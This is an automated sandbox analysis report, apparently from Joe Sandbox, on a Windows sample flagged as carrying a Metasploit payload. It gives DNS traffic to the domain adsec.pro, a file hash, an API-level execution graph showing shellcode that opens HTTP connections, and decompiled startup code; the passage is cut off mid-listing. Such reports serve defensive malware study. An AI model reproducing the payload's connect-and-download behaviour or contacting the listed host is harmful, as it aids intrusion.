      Apr 29, 2021 09:45:30.488544941 CEST6153153192.168.2.48.8.8.8
      Apr 29, 2021 09:45:30.545706034 CEST53615318.8.8.8192.168.2.4
      Apr 29, 2021 09:45:30.965362072 CEST4922853192.168.2.48.8.8.8
      Apr 29, 2021 09:45:31.027667046 CEST53492288.8.8.8192.168.2.4
      Apr 29, 2021 09:45:31.757571936 CEST5979453192.168.2.48.8.8.8
      Apr 29, 2021 09:45:31.806217909 CEST53597948.8.8.8192.168.2.4
      Apr 29, 2021 09:45:32.605614901 CEST5591653192.168.2.48.8.8.8
      Apr 29, 2021 09:45:32.667706013 CEST53559168.8.8.8192.168.2.4
      Apr 29, 2021 09:45:33.159276009 CEST5275253192.168.2.48.8.8.8
      Apr 29, 2021 09:45:33.216245890 CEST53527528.8.8.8192.168.2.4
      Apr 29, 2021 09:45:34.498581886 CEST6054253192.168.2.48.8.8.8
      Apr 29, 2021 09:45:34.549938917 CEST53605428.8.8.8192.168.2.4
      Apr 29, 2021 09:45:35.695833921 CEST6068953192.168.2.48.8.8.8
      Apr 29, 2021 09:45:35.760629892 CEST53606898.8.8.8192.168.2.4
      Apr 29, 2021 09:45:45.860032082 CEST6420653192.168.2.48.8.8.8
      Apr 29, 2021 09:45:45.911448956 CEST53642068.8.8.8192.168.2.4
      Apr 29, 2021 09:45:46.114226103 CEST5090453192.168.2.48.8.8.8
      Apr 29, 2021 09:45:46.184962988 CEST53509048.8.8.8192.168.2.4
      Apr 29, 2021 09:45:48.779553890 CEST5752553192.168.2.48.8.8.8
      Apr 29, 2021 09:45:48.838181019 CEST53575258.8.8.8192.168.2.4
      Apr 29, 2021 09:46:20.465852976 CEST5381453192.168.2.48.8.8.8
      Apr 29, 2021 09:46:20.515151978 CEST53538148.8.8.8192.168.2.4
      Apr 29, 2021 09:46:22.035170078 CEST5341853192.168.2.48.8.8.8
      Apr 29, 2021 09:46:22.092725992 CEST53534188.8.8.8192.168.2.4

      DNS Queries

      TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
      Apr 29, 2021 09:45:17.269332886 CEST192.168.2.48.8.8.80x63fcStandard query (0)adsec.proA (IP address)IN (0x0001)

      DNS Answers

      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
      Apr 29, 2021 09:45:17.487935066 CEST8.8.8.8192.168.2.40x63fcNo error (0)adsec.pro163.172.159.210A (IP address)IN (0x0001)

      Code Manipulations

      Statistics

      CPU Usage

      Click to jump to process

      Memory Usage

      Click to jump to process

      High Level Behavior Distribution

      Click to dive into process behavior distribution

      System Behavior

      General

      Start time:09:44:45
      Start date:29/04/2021
      Path:C:\Users\user\Desktop\icom32.exe
      Wow64 process (32bit):true
      Commandline:'C:\Users\user\Desktop\icom32.exe'
      Imagebase:0x400000
      File size:62464 bytes
      MD5 hash:D1F66D78808B8CBD18804812F1A457A5
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Yara matches:
      • Rule: JoeSecurity_MetasploitPayload_3, Description: Yara detected Metasploit Payload, Source: 00000000.00000002.780692160.0000000000700000.00000040.00000001.sdmp, Author: Joe Security
      Reputation:low

      Disassembly

      Code Analysis

      Reset < >

        Execution Graph

        Execution Coverage:6.6%
        Dynamic/Decrypted Code Coverage:1.8%
        Signature Coverage:9.6%
        Total number of Nodes:561
        Total number of Limit Nodes:6

        Graph

        execution_graph 4363 40a900 4364 40a9a3 4363->4364 4365 40a912 4363->4365 4365->4365 4366 405700 2 API calls 4365->4366 4367 40a93c 4366->4367 4369 405700 2 API calls 4367->4369 4372 40a958 4367->4372 4370 40a952 4369->4370 4371 40a9a9 4370->4371 4370->4372 4373 40c820 7 API calls 4371->4373 4375 40c820 4372->4375 4374 40a9b5 4373->4374 4376 4087e0 CharUpperA 4375->4376 4380 40c833 4376->4380 4377 40c933 4377->4364 4378 40c929 4394 40cde0 4378->4394 4380->4377 4380->4378 4383 408a00 4380->4383 4387 40a890 4380->4387 4384 408a0c 4383->4384 4385 408a14 SetStdHandle 4384->4385 4386 408a1a 4384->4386 4385->4386 4386->4380 4388 40a8c5 4387->4388 4389 40a89d 4387->4389 4391 40a780 2 API calls 4388->4391 4390 40a8db 4389->4390 4414 40c7a0 4389->4414 4390->4380 4391->4389 4395 40ce04 4394->4395 4396 405700 2 API calls 4395->4396 4402 40ce0e 4395->4402 4397 40ce29 4396->4397 4399 405700 2 API calls 4397->4399 4400 40ce6d 4397->4400 4397->4402 4398 40ce8e SetEnvironmentVariableA 4403 40cea9 4398->4403 4399->4400 4400->4398 4401 40cecd 4400->4401 4401->4377 4402->4377 4403->4402 4418 40d070 4403->4418 4405 40cef0 4405->4402 4406 405700 2 API calls 4405->4406 4407 40cf1a 4406->4407 4408 40cf51 4407->4408 4428 40d270 4407->4428 4408->4377 4412 40cf71 4412->4377 4413 40cf31 4413->4377 4415 40c7a8 4414->4415 4416 40a8b5 4414->4416 4415->4416 4417 40c390 GetFileType 4415->4417 4416->4380 4417->4416 4419 40d081 4418->4419 4427 40d0b3 4418->4427 4420 40d0af 4419->4420 4422 40d10d 4419->4422 4419->4427 4421 405700 2 API calls 4420->4421 4420->4427 4421->4427 4423 40d142 4422->4423 4424 40d19b 4422->4424 4422->4427 4425 405700 2 API calls 4423->4425 4426 40a6c0 2 API calls 4424->4426 4425->4427 4426->4427 4427->4405 4432 40d2bd 4428->4432 4433 40d280 4428->4433 4429 40cf2c 4429->4413 4434 40d510 4429->4434 4430 40d6f0 MultiByteToWideChar 4430->4432 4432->4429 4432->4430 4433->4429 4441 40d6f0 4433->4441 4435 40d51f 4434->4435 4439 40d553 4434->4439 4436 40d54f 4435->4436 4438 40d598 4435->4438 4435->4439 4437 405700 2 API calls 4436->4437 4436->4439 4437->4439 4438->4439 4440 40a6c0 2 API calls 4438->4440 4439->4412 4440->4439 4442 40d6f3 4441->4442 4443 40d758 MultiByteToWideChar 4442->4443 4444 40d708 4442->4444 4443->4444 4444->4433 4272 40c390 4275 4089f0 4272->4275 4274 40c397 GetFileType 4275->4274 4276 40c550 GetLastError 4277 40c55f 4276->4277 4278 40a45e 4279 40c3e6 4278->4279 4280 40c3f4 GetACP 4279->4280 4281 40c3fe 4279->4281 4284 40c3fa 4280->4284 4282 40c403 GetOEMCP 4281->4282 4281->4284 4282->4284 4283 40c464 GetCPInfo 4285 40c473 4283->4285 4287 40c47d 4283->4287 4284->4283 4286 40c410 4284->4286 4287->4286 4288 40c4ba GetOEMCP 4287->4288 4288->4286 4289 40ad5e 4290 40ad99 4289->4290 4291 40ad69 4289->4291 4291->4290 4292 40adab 4291->4292 4293 40ad8f 4291->4293 4301 40acc0 4292->4301 4298 40ac80 4293->4298 4299 40ac95 SetConsoleCtrlHandler 4298->4299 4300 40ac8b 4298->4300 4299->4300 4302 40accb 4301->4302 4303 40acdc SetConsoleCtrlHandler 4301->4303 4303->4302 4304 40935e 4305 409360 4304->4305 4313 409380 4305->4313 4318 4092b0 LoadLibraryA 4305->4318 4309 4093a4 4310 4093df GetStdHandle WriteFile 4309->4310 4309->4313 4324 409300 4310->4324 4312 409421 GetStdHandle WriteFile 4317 40945b 4312->4317 4314 40958d GetStdHandle WriteFile 4314->4313 4315 4095cb 4314->4315 4315->4313 4316 40961e GetStdHandle WriteFile 4315->4316 4316->4313 4316->4315 4317->4314 4319 4092d2 GetProcAddress 4318->4319 4320 4092c4 4318->4320 4319->4320 4320->4313 4321 40aaf0 4320->4321 4326 40aa60 4321->4326 4323 40aaf5 4323->4309 4325 40930c 4324->4325 4325->4312 4325->4325 4327 40aa6a 4326->4327 4328 40aa73 4327->4328 4329 40aa87 CreateFileA 4327->4329 4330 40aaab CreateFileA 4328->4330 4332 40aa7c 4328->4332 4329->4328 4331 40aad5 4330->4331 4331->4323 4332->4323 4459 40aade 4460 40aa60 2 API calls 4459->4460 4461 40aae5 4460->4461 4155 406f20 4162 4097b0 SetUnhandledExceptionFilter 4155->4162 4157 406f2d GetModuleHandleA 4165 406ce0 4157->4165 4159 406f40 4180 409a70 VirtualQuery 4159->4180 4161 406f50 4163 4097c1 4162->4163 4164 4097c4 SetUnhandledExceptionFilter 4162->4164 4163->4157 4164->4157 4182 408ac0 4165->4182 4167 406cf7 GetEnvironmentStringsA GetVersion GetModuleFileNameA 4204 408bf0 GetVersion 4167->4204 4169 406d94 GetCommandLineA 4214 408c90 4169->4214 4173 406e06 4217 408cd0 4173->4217 4175 406e75 4175->4159 4176 406e7e GetModuleFileNameA 4177 408bf0 6 API calls 4176->4177 4178 406eaa 4177->4178 4178->4159 4179 406e0b 4179->4175 4179->4176 4181 409aa5 4180->4181 4181->4161 4221 408870 4182->4221 4184 408acc GetStdHandle 4185 408ada 4184->4185 4186 408ae4 4185->4186 4229 408a50 4185->4229 4235 408910 4186->4235 4190 408af7 4191 408afc 4190->4191 4192 408a50 3 API calls 4190->4192 4193 408910 2 API calls 4191->4193 4192->4191 4194 408b01 GetStdHandle 4193->4194 4195 408b23 4194->4195 4196 408b0f 4194->4196 4197 408a50 3 API calls 4195->4197 4196->4195 4198 408b14 4196->4198 4199 408b28 4197->4199 4200 408910 2 API calls 4198->4200 4202 408910 2 API calls 4199->4202 4201 408b19 4200->4201 4201->4167 4203 408b2d 4202->4203 4203->4167 4205 408c09 4204->4205 4206 408c1e GetModuleFileNameW 4204->4206 4207 405700 2 API calls 4205->4207 4206->4169 4208 408c13 4207->4208 4209 408c19 4208->4209 4210 408c2c GetModuleFileNameA 4208->4210 4209->4169 4211 408c60 4210->4211 4212 408c3d MultiByteToWideChar 4210->4212 4211->4169 4213 408c55 4212->4213 4213->4169 4215 405700 2 API calls 4214->4215 4216 406da9 GetCommandLineW 4215->4216 4216->4173 4216->4179 4218 408cda 4217->4218 4219 405700 2 API calls 4218->4219 4220 408ce6 4219->4220 4220->4179 4222 408886 4221->4222 4223 40887d 4221->4223 4224 40889b 4222->4224 4225 4088bf 4222->4225 4223->4184 4227 405700 2 API calls 4224->4227 4241 40a6c0 4225->4241 4228 4088a0 4227->4228 4228->4184 4228->4228 4230 408a59 CreateEventA 4229->4230 4231 408a8a 4230->4231 4232 408a6f 4230->4232 4233 40a6c0 2 API calls 4231->4233 4232->4186 4234 408a9e 4233->4234 4234->4186 4236 408922 4235->4236 4237 408870 2 API calls 4236->4237 4239 408960 GetStdHandle 4236->4239 4238 408952 4237->4238 4238->4239 4247 40a780 4238->4247 4239->4190 4242 40a717 4241->4242 4244 40a6cd 4241->4244 4243 405700 2 API calls 4242->4243 4246 40a6ec 4243->4246 4245 405700 2 API calls 4244->4245 4244->4246 4245->4246 4246->4228 4248 40a792 4247->4248 4249 40a7d1 4248->4249 4250 40a7a6 4248->4250 4251 405700 2 API calls 4249->4251 4252 40a6c0 2 API calls 4250->4252 4253 40a7b1 4251->4253 4252->4253 4253->4239 4333 407460 4336 4074b0 4333->4336 4335 407483 4337 4074cd 4336->4337 4338 405700 2 API calls 4337->4338 4339 4074f2 4338->4339 4339->4335 4340 409360 4341 40938f 4340->4341 4349 409380 4340->4349 4342 4092b0 2 API calls 4341->4342 4343 40939b 4342->4343 4344 40aaf0 2 API calls 4343->4344 4343->4349 4345 4093a4 4344->4345 4346 4093df GetStdHandle WriteFile 4345->4346 4345->4349 4347 409300 4346->4347 4348 409421 GetStdHandle WriteFile 4347->4348 4353 40945b 4348->4353 4350 40958d GetStdHandle WriteFile 4350->4349 4351 4095cb 4350->4351 4351->4349 4352 40961e GetStdHandle WriteFile 4351->4352 4352->4349 4352->4351 4353->4350 4445 409d20 4446 409d29 4445->4446 4447 409d2d 4445->4447 4448 409a70 VirtualQuery 4447->4448 4449 409d3b GetCurrentThreadId 4448->4449 4462 40abe0 4463 40abe9 4462->4463 4464 40abed 4463->4464 4466 40adf0 4463->4466 4467 40adfa 4466->4467 4468 40ae3d 4467->4468 4470 40ae10 4467->4470 4472 40c9f7 4467->4472 4468->4464 4470->4468 4471 40acc0 SetConsoleCtrlHandler 4470->4471 4471->4468 4475 40a010 4472->4475 4476 40a01d 4475->4476 4477 40a021 4476->4477 4480 409fb0 4476->4480 4477->4470 4481 409fbc GetStdHandle WriteFile GetStdHandle WriteFile 4480->4481 4483 40c7e0 4484 40c7a0 GetFileType 4483->4484 4485 40c7e8 4484->4485 4486 4059e0 4489 4077b0 4486->4489 4488 4059ec 4491 4077be 4489->4491 4490 40784b 4490->4488 4491->4490 4492 407890 3 API calls 4491->4492 4493 4077f2 4491->4493 4492->4493 4494 407825 4493->4494 4496 408600 7 API calls 4493->4496 4494->4490 4495 408600 7 API calls 4494->4495 4495->4490 4496->4494 4581 4077a0 4584 407730 4581->4584 4583 4077a7 4585 40776b 4584->4585 4586 407749 4584->4586 4585->4583 4586->4585 4587 40a0d0 8 API calls 4586->4587 4587->4586 4450 40aa21 4451 40aa26 4450->4451 4452 40aaab CreateFileA 4451->4452 4453 40aa4c 4451->4453 4454 40aad5 4452->4454 4497 4097ec 4499 409803 4497->4499 4498 409844 UnhandledExceptionFilter 4500 409865 ExitProcess 4498->4500 4499->4498 4588 408bac 4589 408bc2 4588->4589 4590 408bbb 4588->4590 4591 408870 2 API calls 4589->4591 4592 408bc7 4591->4592 4593 408bd6 4592->4593 4594 40a780 2 API calls 4592->4594 4594->4593 4501 40a0ee 4502 40a0fa 4501->4502 4503 40a10e 4502->4503 4506 40a0d0 4502->4506 4505 40a12e 4509 40a030 4506->4509 4508 40a0d8 4508->4505 4510 40a042 4509->4510 4511 40a0b4 4509->4511 4512 40a04e 4510->4512 4513 408600 7 API calls 4510->4513 4511->4508 4514 40a06d 4512->4514 4515 40a470 2 API calls 4512->4515 4513->4512 4517 40a079 4514->4517 4518 40c330 4514->4518 4515->4514 4517->4508 4519 40c372 4518->4519 4520 40c33a 4518->4520 4519->4517 4520->4519 4521 40c347 CloseHandle 4520->4521 4522 40c354 4521->4522 4524 40c359 4521->4524 4523 40c540 GetLastError 4522->4523 4523->4524 4524->4517 4595 40aeae 4596 40aeb6 4595->4596 4597 40aeba 4596->4597 4598 40acc0 SetConsoleCtrlHandler 4596->4598 4599 40aec1 4598->4599 3936 409d70 3937 409d94 3936->3937 3940 4013e0 3937->3940 3939 409da4 3956 401010 WSAStartup 3940->3956 3943 401403 3986 4013b0 MessageBoxA 3943->3986 3944 401414 Sleep 3946 401010 24 API calls 3944->3946 3947 401426 3946->3947 3948 40143d 3947->3948 3949 40142f 3947->3949 3951 401456 VirtualAlloc 3948->3951 3952 401448 3948->3952 3987 4013b0 MessageBoxA 3949->3987 3983 401310 3951->3983 3988 4013b0 MessageBoxA 3952->3988 3955 401408 3955->3939 3957 40105f gethostbyname 3956->3957 3958 40103f WSAGetLastError 3956->3958 3960 401074 WSACleanup 3957->3960 3961 401085 htons 3957->3961 3959 4054d0 11 API calls 3958->3959 3962 401051 3959->3962 3960->3962 3963 4010b4 3961->3963 3962->3943 3962->3944 3964 4010dc connect 3963->3964 3965 4010bd 3963->3965 3966 4010f5 3964->3966 3967 4012e8 closesocket WSACleanup 3964->3967 3968 4054d0 11 API calls 3965->3968 3989 405500 3966->3989 3967->3962 3970 4010c8 WSACleanup 3968->3970 3970->3962 3971 401107 3972 401117 send 3971->3972 3992 4054d0 3972->3992 3975 4054d0 11 API calls 3976 401168 3975->3976 3977 4054d0 11 API calls 3976->3977 3978 4011c6 3977->3978 3979 4054d0 11 API calls 3978->3979 3980 4012da 3979->3980 3995 405670 3980->3995 3984 405700 2 API calls 3983->3984 3985 40132b 3984->3985 3985->3955 3986->3955 3987->3955 3988->3955 4001 405ae0 3989->4001 4036 405a00 3992->4036 3994 40113b recv 3994->3975 3996 405685 3995->3996 4114 406800 3996->4114 3998 40569c 4119 406970 3998->4119 4000 4012e5 4000->3967 4004 407930 4001->4004 4005 40551b 4004->4005 4007 407964 4004->4007 4005->3971 4007->4005 4009 407fd0 4007->4009 4023 407f60 4007->4023 4012 407fff 4009->4012 4010 408406 4013 4081d5 4010->4013 4016 40804e 4010->4016 4018 40841f 4010->4018 4011 40803c 4014 40a250 WideCharToMultiByte 4011->4014 4011->4016 4012->4010 4012->4011 4012->4013 4013->4016 4017 408499 4013->4017 4020 40833e 4013->4020 4015 4085c5 4014->4015 4015->4007 4016->4007 4017->4016 4022 407d60 WideCharToMultiByte 4017->4022 4018->4016 4033 40a250 4018->4033 4020->4016 4027 407d60 4020->4027 4022->4016 4025 407f73 4023->4025 4026 407faa 4023->4026 4024 40a250 WideCharToMultiByte 4024->4025 4025->4024 4025->4026 4026->4007 4028 407d71 4027->4028 4029 407d98 4027->4029 4030 407d8f 4028->4030 4031 40a250 WideCharToMultiByte 4028->4031 4029->4030 4032 40a250 WideCharToMultiByte 4029->4032 4030->4016 4031->4028 4032->4029 4034 40a260 WideCharToMultiByte 4033->4034 4035 40a25b 4033->4035 4034->4035 4035->4016 4037 405a0f 4036->4037 4038 405aa3 4037->4038 4039 405a43 4037->4039 4045 407890 4037->4045 4038->3994 4041 407930 WideCharToMultiByte 4039->4041 4042 405a6b 4041->4042 4043 405a85 4042->4043 4050 408600 4042->4050 4043->3994 4059 40a210 4045->4059 4051 408611 4050->4051 4052 408691 4051->4052 4053 40861e 4051->4053 4054 408649 4052->4054 4104 40a500 4052->4104 4053->4054 4089 40a470 4053->4089 4058 408678 4054->4058 4097 40a4b0 4054->4097 4058->4043 4060 40789a 4059->4060 4061 40a21d 4059->4061 4063 405700 4060->4063 4067 40c390 4061->4067 4064 40570f 4063->4064 4066 405765 4063->4066 4064->4066 4071 407330 4064->4071 4066->4039 4070 4089f0 4067->4070 4069 40c397 GetFileType 4069->4060 4070->4069 4076 409bd0 4071->4076 4075 40733f 4075->4064 4077 409bd9 4076->4077 4078 407338 4077->4078 4084 409c80 4077->4084 4080 4072a0 4078->4080 4081 4072b1 4080->4081 4083 4072ba 4080->4083 4082 4072cd VirtualAlloc 4081->4082 4081->4083 4082->4083 4083->4075 4087 409c10 VirtualFree 4084->4087 4088 409c2c 4087->4088 4088->4077 4090 40a475 4089->4090 4091 40a494 4089->4091 4090->4091 4092 40a486 SetFilePointer 4090->4092 4091->4054 4093 40a492 4092->4093 4094 40a4a5 4092->4094 4093->4054 4112 40c540 GetLastError 4094->4112 4096 40a4aa 4096->4054 4098 40a4b9 4097->4098 4099 40a4e1 4097->4099 4098->4099 4100 40a4c6 FlushFileBuffers 4098->4100 4099->4058 4101 40a4d1 4100->4101 4102 40a4d6 4100->4102 4103 40c540 GetLastError 4101->4103 4102->4058 4103->4102 4105 40a57d 4104->4105 4106 40a515 4104->4106 4105->4052 4106->4105 4107 40a558 WriteFile 4106->4107 4110 40a541 SetFilePointer 4106->4110 4108 40a570 GetLastError 4107->4108 4109 40a5b9 4107->4109 4108->4105 4109->4052 4110->4107 4111 40a5a5 GetLastError 4110->4111 4111->4105 4113 40c54d 4112->4113 4113->4096 4125 4087e0 4114->4125 4118 406812 4118->3998 4120 406981 4119->4120 4121 40698e 4119->4121 4120->4000 4122 406999 4121->4122 4144 406920 4121->4144 4122->4000 4124 4069ba 4124->4000 4126 40680b 4125->4126 4128 4087f5 4125->4128 4129 406600 4126->4129 4127 40a660 CharUpperA 4127->4128 4128->4126 4128->4127 4130 406612 4129->4130 4131 4067ab 4129->4131 4132 406626 GetTimeZoneInformation 4130->4132 4133 4066b2 4130->4133 4131->4118 4132->4133 4134 406649 4132->4134 4133->4118 4138 408740 4134->4138 4137 408740 WideCharToMultiByte 4137->4133 4139 4087bc 4138->4139 4143 408756 4138->4143 4140 40668f 4139->4140 4141 40a250 WideCharToMultiByte 4139->4141 4140->4133 4140->4137 4141->4139 4142 40a250 WideCharToMultiByte 4142->4143 4143->4140 4143->4142 4145 40692b 4144->4145 4149 40694f 4145->4149 4150 406830 4145->4150 4147 406944 4148 406830 3 API calls 4147->4148 4148->4149 4149->4124 4151 406858 4150->4151 4152 40683f 4150->4152 4153 405670 3 API calls 4151->4153 4152->4147 4154 4068ae 4153->4154 4154->4147 4254 700000 4257 70008f LoadLibraryA 4254->4257 4259 7000a7 InternetOpenA 4257->4259 4260 70015e 4259->4260 4263 7000ba InternetConnectA 4260->4263 4264 7000d2 4263->4264 4268 7000d7 HttpOpenRequestA 4264->4268 4270 7000d2 4268->4270 4269 7002e8 ExitProcess 4270->4269 4271 700168 ExitProcess 4270->4271 4455 408b30 4456 408b3e 4455->4456 4457 408b54 CloseHandle 4456->4457 4458 408b6f 4456->4458 4457->4457 4457->4458 4525 40d2f0 4526 40d313 4525->4526 4527 405700 2 API calls 4526->4527 4534 40d31d 4526->4534 4528 40d33c 4527->4528 4529 40d371 4528->4529 4530 405700 2 API calls 4528->4530 4528->4534 4532 40d3c0 4529->4532 4547 40d7a0 4529->4547 4530->4529 4533 40d396 4533->4534 4535 40d3e8 4533->4535 4562 40d890 4533->4562 4537 40d510 2 API calls 4535->4537 4538 40d3ef 4537->4538 4538->4534 4539 405700 2 API calls 4538->4539 4540 40d40d 4539->4540 4541 40d443 4540->4541 4542 408740 WideCharToMultiByte 4540->4542 4543 40d41e 4542->4543 4544 40d070 2 API calls 4543->4544 4546 40d423 4543->4546 4545 40d463 4544->4545 4548 40d817 SetEnvironmentVariableW 4547->4548 4549 40d7b8 4547->4549 4557 40d801 4548->4557 4550 405700 2 API calls 4549->4550 4552 40d7c9 4550->4552 4551 40d7d5 4553 408740 WideCharToMultiByte 4551->4553 4551->4557 4552->4551 4554 405700 2 API calls 4552->4554 4552->4557 4555 40d7e3 4553->4555 4554->4551 4556 40d7f0 SetEnvironmentVariableA 4555->4556 4558 408740 WideCharToMultiByte 4555->4558 4559 40d845 4555->4559 4556->4557 4557->4533 4560 40d86d 4558->4560 4559->4533 4560->4556 4561 40d876 4560->4561 4561->4533 4565 40d89e 4562->4565 4567 40d8a7 4562->4567 4563 405700 2 API calls 4563->4565 4564 40d270 MultiByteToWideChar 4564->4565 4565->4563 4565->4564 4566 40d510 2 API calls 4565->4566 4565->4567 4566->4565 4567->4535 4568 40d6f3 4569 40d6ff 4568->4569 4571 40d708 4568->4571 4570 40d758 MultiByteToWideChar 4569->4570 4569->4571 4570->4571 4354 406f7c 4358 406ec0 4354->4358 4356 406f99 ExitProcess 4357 406f87 4357->4356 4359 406ece 4358->4359 4360 406ef1 4359->4360 4361 406f06 FreeEnvironmentStringsA 4359->4361 4360->4357 4361->4357 4572 4059fe 4573 405a0f 4572->4573 4574 405aa3 4573->4574 4575 405a43 4573->4575 4576 407890 3 API calls 4573->4576 4577 407930 WideCharToMultiByte 4575->4577 4576->4575 4578 405a6b 4577->4578 4579 405a85 4578->4579 4580 408600 7 API calls 4578->4580 4580->4579 4600 40a9be 4603 40c940 4600->4603 4602 40a9c8 4604 40c950 4603->4604 4606 40c9a7 4603->4606 4605 405700 2 API calls 4604->4605 4605->4606 4606->4602 4362 40de7f SetEnvironmentVariableA

        Executed Functions

        Control-flow Graph

        APIs
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.780340233.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.780335115.0000000000400000.00000002.00020000.sdmp Download File
        • Associated: 00000000.00000002.780346891.0000000000405000.00000020.00020000.sdmp Download File
        • Associated: 00000000.00000002.780357265.000000000040E000.00000004.00020000.sdmp Download File
        • Associated: 00000000.00000002.780365618.0000000000411000.00000002.00020000.sdmp Download File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_icom32.jbxd
        Similarity
        • API ID: CleanupErrorLastStartupgethostbyname
        • String ID: ==|%s|==$@@s$Date: $Day:%d Mon:%d Year:%d %d:%d:%d$GET drv$GMT$Recv i = %d$Send i = %d$WSAStart error %d$[!] sock INVALID_SOCKET$google.com
        • API String ID: 2427713200-2930182172
        • Opcode ID: 87255d569cd8bed954b22e06fa1ed1c6cf954e84d4e4819b787c21827043e984
        • Instruction ID: 543d407db142f56f7e62288f27103ab2dc4fb170fd8529daf1628ccaf14530b5
        • Opcode Fuzzy Hash: 87255d569cd8bed954b22e06fa1ed1c6cf954e84d4e4819b787c21827043e984
        • Instruction Fuzzy Hash: 3BA1D4B4E00608AFCB10DFE9D989A9EBBB8EB08314F5045B6F514F7391D7399A418F64
        Uniqueness

        Uniqueness Score: -1.00%

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 55 406ce0-406d8f call 408ac0 GetEnvironmentStringsA GetVersion GetModuleFileNameA call 408bf0 59 406d94-406db5 GetCommandLineA call 408c90 55->59 62 406dd4-406dd7 59->62 63 406db7-406dc2 59->63 66 406de4-406de7 62->66 67 406dd9-406ddc 62->67 64 406dc4-406dcf 63->64 65 406dec-406dee 63->65 68 406dd1-406dd2 64->68 69 406df3-406e00 GetCommandLineW 64->69 65->64 72 406df0-406df1 65->72 66->64 71 406de9-406dea 66->71 67->66 70 406dde-406de2 67->70 68->64 73 406e06-406e19 call 408cd0 69->73 74 406e67 69->74 70->66 70->67 71->64 72->63 81 406e3a-406e40 73->81 82 406e1b-406e26 73->82 76 406e6c-406e73 74->76 78 406e75-406e7d 76->78 79 406e7e-406ebc GetModuleFileNameA call 408bf0 76->79 86 406e51-406e55 81->86 87 406e42-406e46 81->87 84 406e28-406e33 82->84 85 406e5c-406e60 82->85 84->76 88 406e35-406e38 84->88 85->84 91 406e62-406e65 85->91 86->84 90 406e57-406e5a 86->90 87->86 89 406e48-406e4f 87->89 88->84 89->86 89->87 90->84 91->82
        C-Code - Quality: 100%
        			E00406CE0(signed int __eax, struct HINSTANCE__* __ebx, intOrPtr __edx, void* __eflags) {
        				CHAR* _t14;
        				signed int _t16;
        				intOrPtr* _t28;
        				short* _t30;
        				short* _t36;
        				intOrPtr _t39;
        				short _t41;
        				signed int _t47;
        				signed int _t61;
        				signed int _t62;
        				struct HINSTANCE__* _t63;
        
        				_t62 = __eax;
        				_t63 = __ebx;
        				 *0x410024 = __eax;
        				 *0x40f510 = __edx;
        				E00408AC0(); // executed
        				_t14 = GetEnvironmentStringsA(); // executed
        				 *0x40f59a = _t14;
        				 *0x410648 = 0;
        				_t16 = GetVersion();
        				 *0x40f5a0 = _t16;
        				 *0x40f5a2 = _t16 >> 0x10;
        				 *0x40f5a4 = 0;
        				 *0x40f5a8 = 0;
        				 *0x40f5a1 = (_t16 & 0x0000ffff) >> 0x00000008 & 0x000000ff;
        				_t47 =  *0x40f5a8; // 0x6
        				 *0x40f5ac = 0;
        				 *0x40f5b0 = _t47 << 8;
        				GetModuleFileNameA(0, "C:\Users\jones\Desktop\icom32.exe", 0x104);
        				 *0x40f568 = 0x410028;
        				E00408BF0(0, 0x208, 0x41012c);
        				 *0x40f574 = 0x41012c;
        				_t28 = E00408C90(GetCommandLineA());
        				_t39 =  *_t28;
        				 *0x410020 = _t28;
        				if(_t39 == 0x22) {
        					_t28 = _t28 + 1;
        					__eflags = _t39 -  *_t28;
        					if(_t39 ==  *_t28) {
        						L7:
        						__eflags =  *_t28;
        						if( *_t28 != 0) {
        							_t28 = _t28 + 1;
        						}
        						L2:
        						if(( *0x00405B01 & 0x00000002) != 0) {
        							_t28 = _t28 + 1;
        							goto L2;
        						}
        						 *0x40f564 = _t28;
        						__eflags = GetCommandLineW();
        						if(__eflags == 0) {
        							_t30 = 0x406ca0;
        							L24:
        							 *0x40f570 = _t30;
        							__eflags = _t62;
        							if(_t62 != 0) {
        								GetModuleFileNameA(_t63, 0x410334, 0x104);
        								 *0x40f56c = 0x410334;
        								E00408BF0(_t63, 0x208, 0x410438);
        								 *0x40f578 = 0x410438;
        								return 1;
        							} else {
        								return 1;
        							}
        						}
        						_t36 = E00408CD0(_t29, __eflags);
        						_t41 =  *_t36;
        						 *0x41001c = _t36;
        						__eflags = _t41 - 0x22;
        						if(_t41 == 0x22) {
        							_t30 = _t36 + 2;
        							__eflags = _t41 -  *_t30;
        							if(_t41 ==  *_t30) {
        								L19:
        								__eflags =  *_t30;
        								if( *_t30 != 0) {
        									_t30 = _t30 + 2;
        								}
        								while(1) {
        									L14:
        									__eflags =  *0x00405B01 & 0x00000002;
        									if(( *0x00405B01 & 0x00000002) == 0) {
        										goto L24;
        									}
        									_t30 = _t30 + 2;
        								}
        								goto L24;
        							} else {
        								goto L17;
        							}
        							while(1) {
        								L17:
        								__eflags =  *_t30;
        								if( *_t30 == 0) {
        									goto L19;
        								}
        								_t30 = _t30 + 2;
        								__eflags =  *_t30 - 0x22;
        								if( *_t30 != 0x22) {
        									continue;
        								}
        								goto L19;
        							}
        							goto L19;
        						} else {
        							goto L13;
        						}
        						while(1) {
        							L13:
        							__eflags =  *0x00405B01 & 0x00000002;
        							if(( *0x00405B01 & 0x00000002) != 0) {
        								goto L14;
        							}
        							__eflags =  *_t36;
        							if( *_t36 == 0) {
        								goto L14;
        							}
        							_t36 = _t36 + 2;
        						}
        						goto L14;
        					} else {
        						goto L5;
        					}
        					while(1) {
        						L5:
        						__eflags =  *_t28;
        						if( *_t28 == 0) {
        							goto L7;
        						}
        						_t28 = _t28 + 1;
        						__eflags =  *_t28 - 0x22;
        						if( *_t28 != 0x22) {
        							continue;
        						}
        						goto L7;
        					}
        					goto L7;
        				} else {
        					goto L1;
        				}
        				while(1) {
        					L1:
        					_t61 =  *_t28;
        					if(( *0x00405B01 & 0x00000002) != 0) {
        						goto L2;
        					}
        					__eflags = _t61;
        					if(_t61 == 0) {
        						goto L2;
        					} else {
        						_t28 = _t28 + 1;
        						continue;
        					}
        				}
        				goto L2;
        			}














        0x00406ce3
        0x00406ce5
        0x00406ce7
        0x00406cec
        0x00406cf2
        0x00406cf7
        0x00406cfd
        0x00406d04
        0x00406d09
        0x00406d11
        0x00406d1e
        0x00406d37
        0x00406d4c
        0x00406d53
        0x00406d5b
        0x00406d6d
        0x00406d72
        0x00406d78
        0x00406d85
